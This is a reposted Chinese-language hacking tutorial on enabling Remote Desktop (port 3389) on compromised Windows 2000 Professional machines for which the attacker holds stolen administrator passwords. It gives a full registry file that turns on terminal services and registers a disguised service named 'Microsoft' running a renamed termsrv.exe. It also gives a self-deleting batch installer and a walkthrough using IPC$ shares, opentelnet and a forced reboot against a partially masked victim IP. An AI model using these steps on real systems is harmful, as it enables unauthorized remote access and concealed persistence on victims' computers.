遠端登陸在專業版下開3389的方法大全(轉)

遠端登陸在專業版下開3389的方法大全(轉)[@more@]

　　在win2000 Professional版中安裝3389終端服務

　　眾所周知windows2000 profassional並不支援3389終端服務，所以我們如果發現得到管理員密碼的肉機是此版本，只能放棄安裝終端服務的念頭。但是現在我們已經可以在profassional版中安裝終端服務了！

　　方法如下：

　　1. 將profassional版改變為server版

　　2. 安裝終端服務

　　關於安裝終端服務的細節網路中已經有許多優秀的文章，這裡不再重複。

　　下邊就說說如何將profassional版改變為server版：

　　原理：其實windows 2000的各個版本都使用了同樣的程式、動態連結庫，它們之間最大的差別是在登錄檔中。windows2000三合一光碟就證明了這一點。因此只要將profassional版登錄檔中的相關專案改為server及以上版本，就可以在profassional版中安裝終端服務了。

　　現在3am Laboratories已經將改變win2000版本的方法做成一個非常方便使用的軟體：NTSwitch，讓我們可以隨心所欲地快速改變版本。此軟體可以在小鳳居中下載到，下載地址為URL

　　可能由於微軟的壓力，3am Laboratories已將此軟體從其主頁中刪除，大家快下載吧！

　　遠端版本變換的具體實現方法：

　　法1：

　　1

　　在遠端肉機上執行支援圖形介面的遠端控制程式（如：冰河、PcAnyWhere等）

　　2

　　遠端控制下，下載並執行NTSwitch改變版本

　　3

　　安裝3389終端服務

　　此法非常方便，技術要求最低。但操作過程對方是全部可以看見的，非常危險！

　　法2：

　　1

　　自己將自己本地的win2000 professional改變為win2000 server版，利用登錄檔對比軟體對比版本變換前後登錄檔的差別。將差別製作成一個chang.reg檔案。

　　2

　　利用所得到的肉機管理員密碼，開啟肉機Telnet服務。

　　3

　　Telnet上肉機後，利用regedit.exe /s chang.reg 命令， 將遠端登錄檔改變，從而實現遠端win2000的版本變換。

　　此法需要一定的經驗，但操作很安全。而且可以用“迷途vb”的方法進一步安裝3389終端服務。

　　以下是“迷途vb”的安裝3389終端服務方法

　　＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

　　首先我們製作開啟3389的工具

　　先把下面的登錄檔內容copy一份，另存為3389.reg登錄檔檔案

　　登錄檔內容：

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion etcache]

　　"Enabled"="0"

　　[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]

　　"ShutdownWithoutLogon"="0"

　　[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]

　　"EnableAdminTSRemote"=dword:00000001

　　[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

　　"TSEnabled"=dword:00000001

　　[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]

　　"Start"=dword:00000002

　　[HKEY_USERS.DEFAULTKeyboard LayoutToggle]

　　"Hotkey"="1"

　　[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService]

　　"Start"=dword:00000002

　　"ErrorControl"=dword:00000001

　　"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00

　　"ObjectName"="LocalSystem"

　　"Type"=dword:00000010

　　"Description"="Microsoft"

　　"DisplayName"="Microsoft"

　　再把下面的內容儲存為批處理檔案3389.bat

　　安裝批處理內容：

　　copy termsrv.exe eventlog.exe

　　regedit.exe /s 3389.reg

　　del 3389.reg

　　del 3389.exe

　　del 3389.bat

　　用winrar製作成exe自解壓縮包

　　61.188.***.*** user:administrato pass:空

　　先使用工具letmein判斷其作業系統

　　letmein ip -all -d

　　TsInternetUser (TsInternetUser)這個是2000的終端使用者，現在可以判斷其為2000server了

　　再使用終端登陸軟體看看他的3389是不是已經開啟了免了費事折騰

　　應該沒有開啟了

　　建立ipc連線

　　copy工具過去

　　net use ipipc$ "pass" /user:name

　　copy file ipadmin$system32

　　用opentelnet開對方的telnet

　　opentelnet ip name pass 1 99

　　用telnet進入

　　進入到對方的winntsystem32目錄

　　解壓縮3389.exe

　　執行安裝批處理3389.bat

　　現在我們把對方重起一下，用reboot

　　我們用ping命令監視他的上線情況，等他下線，呵呵下了，又上來了，不慌連，3389等會才能好，對方的機器有點慢看見了麼，開啟成功!

　　

·上一篇：

·下一篇：

最新更新
	· · · · · · · · · · · · · · · · · · · · · · · · · · · · · ·